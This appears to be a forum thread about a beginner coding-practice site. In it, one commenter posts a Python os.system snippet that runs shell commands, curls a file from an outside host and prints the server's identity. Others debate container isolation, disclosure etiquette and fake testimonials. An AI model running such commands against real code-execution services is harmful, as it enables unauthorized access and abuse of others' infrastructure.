codewarrior
5a8eb7db8f0e
162.243.103.238
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=123 time=0.668 ms
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.668/0.668/0.668/0.000 ms
162.243.103.238 is a DigitalOcean address. My server's log indicates the curl command actually pulled the file. Please secure your services or they will be abused by wrong doers. In all honesty, I would advise to take the entire service down until this is fully mitigated.
For anyone else who runs into this. You can restricted a set of capabilities each container can use. This, for example can deny mount operations, socket access, etc. You can do this via "docker run" --cap-add or --cap-drop [2]. This type of stuff is great for running docker-in-docker for these types of learning tools or Jenkins builds. You'll need to play around with it though to make sure it'll work for you.
Responsible disclosure is meant when it can jeopardize user data or user devices. It’s reasonable to assume none of that apply for a brand new service. Specially now everyone is learning from it.
Seems like a lot of damage could have been obviously omitted by just removing anything os.system(), which for the purpose (not effect here) of Duolingo style education should have been just fine.
I get your point and the other guy’s too. I line up on the side that disclosures should be messy and embarrassing sometimes, as incentive to really think about what you are doing. The danger here is low.
Chances are, they are a beginner. This is someone’s side project not a site backed by a huge corporation. They deserve responsible disclosure so they can learn from it.
On the flip side, if such an embarrassing exploit is found in the first hour, maybe it’s the equivalent to making the student read their note out to the entire class as punishment?
All code is executed in a docker container and destroyed after runtime completes (or times out). It's also contained on a remote server completely unrelated to the functioning of the web app itself. Over the past year and a half I've hired two developers familiar with how docker works to find security exploits. None could find any. Can you still access the file you created?
It's obviously running in a container. I'm not sure your code really shows anything too concerning if they are taking precautions outside of the container to mitigate things like DDoS etc.
I'm just not sure what you are alleging? Just because you have full "shell" access to the container doesn't necessarily imply any thing needs to be mitigated.
What specifically are your concerns? What about what you've learned will create an exorbitant bill?
> "What specifically are your concerns? What about what you've learned will create an exorbitant bill?"
Abusing the containers to send large amounts of outgoing traffic would do just that. Downloading files would do that too. How about sending a "while(true) { }" to hog some CPU? It doesn't take much to cause significant monetary damage.
Depending on their set-up, those containers could contain credentials or some other means to compromise the rest of the website. Perhaps it is possible to re-use the containers across different "sessions", serving multiple clients with malicious traffic. Those are plausible scenarios.
I'm not carrying out a full PT right now. Demonstrating the platform has been compromised is more than enough. Any other questions?
Running ps shows the timeout command as PID 1, and evidently an infinite loop gets killed after some point. In fact, there aren't any other processes besides sh, node, and the Python interpreter, and I'm not familiar with containers to know how this is possibly implemented (because obviously, timeout cannot be PID 1, so ps is wrong here).
But you don't know that they aren't using cgroups or a proxy to throttle traffic or cpu access, right? To me, it seemed that your message was overly dramatic when you didn't really prove anything. Depending on their set-up indeed. I just don't see the compromise in your analysis.
You're right but the fact that he was able to curl a file from the outside does seem pretty bad. It means that you can effectively proxy traffic through the website and use it to target 3rd parties.
Just because you have full "shell" access to the container doesn't necessarily imply any thing needs to be mitigated.
What do you mean? It's an arbitrary RCE - a scenario that's generally treated as game over. What specifically are the concerns you don't have if that happens to a system of yours?
In a very carefully configured container regime, you might not be getting anything other than the access the API already had to run code submitted by users. You'd have RCE, but your code can only do the limited set of things permitted by the container; it might not have access to any meaningful filesystem, or to the network, or to the container engine.
It's very tricky to create and maintain those kinds of container systems, but there are services (for instance, the cloud CI providers) that do it.
On applications like these, where the premise is that you give them some kind of code and they evaluate it for you, escaping the "user interface" sandbox isn't game over; you'd have to finish the exercise of escalating to the container host or getting access to an internal network with internal APIs on it.
It's a little like getting SQL injection, but confined to some kind of SQL view. Chances are the application is doomed, but you still have to prove it.
Right, I understand that but you'd not pick a container as your primary line of isolation for running arbitrary Go code. The GP is saying - it's cool, because containers. Yes, perhaps in exceptionally skilled hands, maybe this is sane but generally it's not. The official go playground's first sandbox is Native Client.
remote code execution doesn't really mean much in an un-privileged container. They could be using cgroup limits, capability drops, MAC, seccomp, etc etc
Now, I'm not saying that containers are super tight by default. It is entirely possible this particular container env is wide open, but I didn't really see anything too concerning from the parents analysis.
remote code execution doesn't really mean much in an un-privileged container.
It means pretty much everything. Have you ever heard of someone reporting an RCE in a major service and it being treated as no big deal? They're invariably treated as catastrophic compromise because it is. The jump from RCE to privilege escalation, escape, etc is nothing compared to the actual RCE-ing.
when the platform is itself about RCE... I think you have to evaluate what specific dangerous code can be executed before you start lighting the torches.
Breaking out of a container isn't the only security worry.
They have a "Register" button at the top right where you can enter a username and password. If you have shell access to the box (no matter how virtual the box is), there's a good chance you can alter the site's code and capture the passwords people enter. And knowing that, in the real world, people do reuse passwords, this could easily lead to compromising accounts on other sites.
They also have a privacy policy (linked at the bottom) in which they make all kinds of promises about not leaking your personal data. If someone can take over their machine, and they know it, and they don't shut it down, it seems like that would violate the promises made in that privacy policy.
Also, of course, an attacker could alter the site to exploit any vulnerabilities in the users' browsers, so it opens up an attack vector there. Obviously users need to keep browsers patched, but people expect the risk to be lower when visiting legitimate sites.
Even if the containers were running on the same physical machine as the webapp you'd have to break out of the container your code is in first... If you know of a container breakout exploit then you should definitely publish it!
I didn't mention anything about docker, seeing that containers are a linux kernel feature, but if you know of container escape vulnerabilities in the kernel you should publish them.
To others thinking about doing this: keep in mind this is against the law in the United States. Even if it's for a "good cause", you can't just "pen-test" (hack) anyone you want.
Granted, I really doubt anyone would prosecute over something like this, but a bigger company? Absolutely possible.
I wonder if WebAssembly could help accomplish that.
Still, even Rust has a compile-and-execute web service call accessible from the rust-lang home page. If Rust people (who tend to emphasize security) feel it is possible to secure that web service, then I'm inclined to believe them. It may be difficult though.
Actually I think the Rust folks would appreciate any feedback on the security of the service, as long as you don't DoS it or use it to do anything bad. :-)
> "He needs to be running a client-side service, not running whatever someone enters on his machine"
I would say that for the most part, websites such as this don't actually need a real, full-blown %s-lang compiler/VM that actually executes real code on a backend server. It would be enough to tokenize and parse things on the client's side and validate ABNF via JS. This would reduce the costs involved with running such a website, and the attack surface. If you want to get fancy, you could host an in-browser Python VM - but that's an overkill for a website such as this. Also, they're trying to support a fair bit of languages here, not all of which have browser-targeted tooling that could compile and run the code.
Then you end up with a system where someone can arrive at the right answer via AST that you didn't expect, which was a frustration when I helped students with a service like (IIRC) CodeCademy.
in this case, `redacted` itself is the tld. the company that owns `.redacted` (Redacted, Inc) has chosen to serve A records for it, which is rather uncommon.
For a while, the owners of `.ai` had a similar arrangement, but it seems to have been since taken down.
Maybe I don't see your point, but an iOS app could execute code locally. The only risk is the device owner could compromise the device. There is no [additional] risk of another user doing so.
Because javascript run locally can connect to the internet, and if it put into the console within the page on a domain that is storing secrets in local storage/cookies, it can scoop up all your credentials or other private information and send them to some other server. Unrestricted local execution can give up full access to local user's accounts, so is not good. Server execution can do that and also maybe impact other users.
Apple forbids that because it wants to be able to control and validate applications on their store. If they allowed self-modifying code apps could auto-update and change their features post-install. This is not really related.
Except that hasn't been true for years in certain circumstances, particularly where the value of an app running user-created code is educational in nature. See Pythonista, Codea, Swift Playgrounds, or hell, Shortcuts.
I just reverse image searched all three of their testimonial photos all all come from random .edu faculty pages with completely different names. They also show up on random Twitter profiles and bandcamp pages. Not sure why they’re using fake testimonial photos but that seems rather scummy.
Some people willingly submit photos to be used in this manner[0], which will lead to them being used all over the place.
Once you've seen this picture of Brad Frost[1] (a web tech personality), it's hilarious how many startup landing page mockups he appears in. I've personally seen dozens.
Just because a testimonial image can be found elsewhere on the web doesn't mean it's fake. The images are of the actual person who gave the testimonial but I changed their names. I see absolutely nothing wrong with doing that.
Having taught people coding for awhile, I don't think the step-by-step teaching models work with coding. It creates an environment where students just think about the next step without internalizing what they learned. I've met students who have gone through freecodecamp's exercises and really struggle with using what they learned.
Edabit seems too heavily on algorithms. I've seen many beginner students get quickly burned out from doing algorithms when starting out.
I've found the most effective way to teach coding is to make their learning project based (very much like how professors taught concepts back in college). Build X, Y, Z, each project building up in complexity so students can think about different combinations of everything they learned to complete the project.
I work with my local library to hold coding office hours
(Should be very easy to set up, they really want to become more technically savvy but the only volunteers they could find is instructors trying to teach microsoft word)
I have my own curriculum that I've built over the years and the students ultimately end up building a product that they launch (hopefully). This year I got to teach 20 students and so far 14 have gotten full time jobs as software engineers. Fortunately, students who got jobs are all doing well at their jobs so its pretty easy to refer people in.
After the remaining 6 students get a full time job, I plan to open source my curriculum that students have helped polish over the years. You can find the gist of it at c0d3.com
Seriously. Yet it's at the top of HN with 150 upvotes. OP posted this twice already and it got 5 and 6 upvotes. Either HN readers are becoming less discerning or this guy gamed upvotes. Judging by the fact that the testimonials feels dishonest, I wouldn't discount the latter.
I don't understand how this is different from Hackerrank/Leetcode or how it's similar to Duolingo. Can someone explain what the innovation is here over HackerRank or LeetCode?
The claim of similarity to Duolingo seems to be based on the "Practice" tab, which let's you re-solve problems you've already solved once. Duolingo and similar apps use spaced repetition[1] to reinforce lessons which is proven to help retain them permanently in long term memory. However Edabit doesn't seem to implement a very complete system so it probably won't be particularly effective. I also doubt space repetition is helpful for learning to program outside of memorizing APIs and standard libraries, which is 10% of programming at most.
As for sites like Leetcode, those are far more mature (wide selection of languages, custom test cases, etc.) with much more interesting challenges. I appears Edabit is targeting beginners and therefore has much shorter, easier challenges which mainly test memory, not knowledge of algorithms or problem solving. Again, not necessarily the aspect of programming that I would encourage beginners to spend their time on compared to understanding basic concepts.
Another way to accomplish this is to add "MDN" to all CSS and JS searches. For example, "mdn array slice" lands right on the best documentation on array slicing (tested on Google and DuckDuckGo).
If you use Firefox, you can add a search keyword for MDN search, so that you can type "mdn array slice" in the address bar and go straight to MDN without needing DuckDuckGo to redirect you.
The community submits links to external resources. I don't want to be left moderating what I personally believe is a good or bad resource. I'd rather users downvote unhelpful resources.
I like this for what it is - so far, fairly simple things to do in Python. I'm a beginning programmer (been studying about a year), so I'm happy to spend a bit of time going through these and feel OK about passing the tests - certainly the other 'code golf' sites that have been mentioned elsewhere in this site have been a love/hate thing for me, with some really out-of-character difficult exercises leading to frustration and a complete stop.
One constructive suggestion - is it possible to add auto-indenting to the editor for Python? I hadn't realised how used to it I have become until it is missing here...
This is also one of my complaints about Duolingo to be honest, in that they only give you information about the lessons you're doing if you navigate to a specific page before starting an exercise (on the web interface, I haven't used the mobile interface). Ui-bug for Ui-bug compatibility?
It could be on purpose? I've found that I learn better when I am forced to read ALL the instructions and then try to solve the problem without having quick access to the instructions.
The way I learned Ruby 5 years ago was by doing Koans[0] which is basically a test suite where the individual cases describe some behavior of ruby or its stdlib and have a small expression missing to be filled in by you.
The idea is basically to allow you to create your OWN flashcards and sync them with Anki with the books you're reading.
Basically you can create flashcards in the app directly and sync them to mobile so you never forget the key points of the documentation you're reading.
Right now I'm working on the cloud version so that people can discover each other and collaborate on building their own cards, share highlights, etc.
The instructions don't load for me in Firefox so I had to open up in Chromium. I disabled my adblocker in FF but didn't do any in-depth troubleshooting.
The hardest challenges are always about Math. People good at Math also seem to have a tendency to be good at programming though. There is however very little Math in my daily job as a programmer.
The Swift version seems to be outdated. To get the length of a String, you need to do string.characters.count, instead of Swift 4's string.count. I think it's on Swift 2.
This has evolved! Great work. I remember seeing this a year or so ago on HN and contributed some solutions. Back then there were only less than 20 quizzes?
Nothing special here. Programming problems to teach beginners how to code. Same approach practically every other site takes. Surprised by the amount of upvotes.
All code is executed in a docker container and destroyed after runtime completes (or times out). It's also being run on a remote server completely unrelated to the functioning of the web app itself. The "security issues" pointed out in this thread are non-issues.
I think the key thing is that these are exercises. People learn by seeing examples and solving problems with gradually increasing difficultly. This appears to be an arena for doing just that.
Concepts and theory are certainly critical, but one needs to practice in order to achieve mastery. The conceptual framework for all this stuff is covered in detail in other resources, anyway.
After taking a cursory look around, Edabit seems to be filling a very specific need. I like it.
Duolingo by itself isn't really enough to really learn a language either. Thanks to Duolingo, I can definitely say "the woman eats the apple" in Italian, but I don't understand the language's grammar and its verb conjugation rules enough to build complete sentences.
"The woman eats the apple." is a complete sentence, no? Do you mean you only memorized specific sentences, but did not end up with any generalizable knowledge? I've never tried Duolingo, but I kind of expected them to not show you exactly the same exercises again, so that you wouldn't pass them with just memorization.
I was hoping for an answer that explains how it is possible to pass a course on Duolingo (i.e. answer the exercises correctly) without actually learning enough of the language to apply it to new situations. If the problem is just that you can memorize the answer to each question and regurgitate it when you see the same question again, that'd be fixable by creating many more questions. But if the problem is something else, it might not be so simple.
Look, as you mentioned, you just don't know what you are talking about to extrapolate what you want explained. Use Duolingo for 5 minutes like the rest of us and get with the program.
I did that. I took the initial test for Japanese, where I answered correctly for sentences I already understood or where I was only missing a single word I could guess by elimination. Given multiple options I couldn't distinguish, I messed up as it should be.
Based on the test results, I was skipped past 23 of the 40 topics I can see in the course. Considering that I've been learning for only three months, that makes the course look a bit short.
When I then tried the next lesson, I did notice some questions repeating, but there was also some variety. So I don't know whether it's possible to just memorize all the sentences without learning grammar.
Based on me trying Duolingo a single time now, I'd now say that the biggest problem is the small amount of topics covered in a course, which limits the vocabulary you know how to use after completing it.
But that's not what the original complaint said, so maybe someone who's used Duolingo 5 minutes a day for several months is still in a better position to explain what the actual problem with Duolingo is.
They don't explain rules. They try to classically condition you without explaining why you would ever synthesize a word or phrase that way.
It becomes more apparent when you realize these apps are not smart. They were novel at one point, and maybe you can pick up a phrase to catch a native speaker off guard.
Duolingo is using humans to translate web content that algorithms are unsure about. This is the same founder of reCaptcha, who uses captcha's to use humans to tell robots about what the robots are unsure of.
Memrise, on the other hand, just takes the "87% most used phrases" and tries to get you to memorize the.
They have zero holistic approach to any of the languages they offer. You will never learn tense, language-specific concepts and rules, idioms that break all the rules, or whatever locals just say.
Well, you were misinformed that you could learn a language by doing any one thing.
Apps like Duolingo are just a method for daily exposure on the long journey of language learning.
For example, reading only grammar books isn't going to get you there, either. But doing something every day is possibly the most important part, and Duolingo can help you build a habit.
I see this criticism of Duolingo all the time by people who sound like they think it failed them because they weren't fluent after finishing it. There is no roadmap that will make you fluent without serious, multifaceted effort on your own part, so it's quite weak criticism when one tool doesn't take you end-to-end.
def hello(): import os print(os.system("whoami")) print(os.system("hostname")) print(os.system("curl http://redacted/ > ./owned.txt")) print(os.system("curl -s http://whatismyip.akamai.com/")) print(os.system("cat ./owned.txt")) print(os.system("ping -c 1 8.8.8.8"))
Results:
codewarrior 5a8eb7db8f0e 162.243.103.238 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=123 time=0.668 ms --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.668/0.668/0.668/0.000 ms
162.243.103.238 is a DigitalOcean address. My server's log indicates the curl command actually pulled the file. Please secure your services or they will be abused by wrong doers. In all honesty, I would advise to take the entire service down until this is fully mitigated.